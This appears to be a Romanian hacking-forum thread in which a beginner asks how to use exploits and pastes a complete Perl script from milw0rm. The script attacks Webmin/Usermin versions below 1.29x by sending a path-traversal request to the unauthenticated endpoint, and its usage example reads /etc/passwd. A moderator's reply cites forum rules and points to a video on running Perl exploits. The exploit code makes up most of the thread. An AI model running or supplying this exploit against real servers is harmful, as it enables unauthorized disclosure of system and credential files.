Jump to content
DeathCom

Metasploit Framework

Recommended Posts

Posted

Buna... Cine poate sa imi spuna ce fac exploiturile (pana acum stiu doar unul msrpc_dcom_ms03_0269 win32_reverse_vncinject) si.... cand gasesti un exploit pe net... cum il folosesti?

Ceva de genual asta:

#!/usr/bin/perl

#  Exploit for WEBMIN and USERMIN  less than 1.29x          

#  ARBITARY REMOTE FILE DISCLOSURE

#  WORKS FOR HTTP AND HTTPS (NOW)  

#  Thrusday 13th  July 2006

#  Vulnerability Disclosure at securitydot.net

#  Coded by UmZ! [email]umz32.dll@gmail.com[/email]

#  

#

#

#  Make sure you have LWP before using this exploit.

#  USE IT AT YOUR OWN RISK

#

#  GREETS to wiseguy, Anonymous Individual, Uquali......Jhant... Fakhru... etc........................

#  for other.. like AHMED n FAIZ ... (GET A LIFE MAN).







#  Revised on Friday 14th July 2006

use LWP::Simple;

use LWP::UserAgent;

my $userag = LWP::UserAgent->new;

 

if (@ARGV < 4) {

                   print("Usage: $0 <url> <port> <filename> <target> n");

                   print("TARGETS aren ");

     print("0  - > HTTP n");

     print(" 1  - > HTTPSn");

     print("Define full path with file name n");

     print("Example: ./webmin.pl blah.com 10000 /etc/passwdn");

     exit(1);

                   }



                   ($target, $port,$filename, $tar) = @ARGV;



 print("WEBMIN EXPLOIT !!!!! coded by UmZ!n");

 print("Comments and Suggestions are welcome at umz32.dll [at] gmail.comn");

 print("Vulnerability disclose at securitydot.netnI am just coding it in perl 'cuz I hate PHP!n");

 print("Attacking $target on port $port!n");

 print("FILENAME:  $filenamen");

 



 $temp="/..%01" x 40;

 

 if ($tar == '0')

  { my $url= "http://". $target. ":" . $port ."/unauthenticated/".$temp . $filename;

  $content=get $url;



  print("n FILE CONTENT STARTED");

  print("n -----------------------------------n");



  print("$content");

  print("n -------------------------------------n");

   }



 

 elsif ($tar == '1')

   {

  my $url= "https://". $target. ":" . $port ."/unauthenticated/".$temp . $filename;

  my $req = HTTP::Request->new(GET => $url);

  my $res = $userag->request($req);

    if ($res->is_success) {

         print("FILE CONTENT STARTEDn");

   print("-------------------------------------------n");

   print $res->as_string;

     print("-------------------------------------------n");

     }

    else {

        print "Failed: ", $res->status_line, "n";

         }

  }



# milw0rm.com [2006-07-15]

Posted

1. wrong section

2. trebe sa ai minim 10 posturi sa poti cere/ajutor la ceva

3. citeste regulile

4. ai un warning !

5. te-ai uitat macar la sectiunea exploituri si pocs ? acolo este VIDEO cum sa rulezi exploit in perl !

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...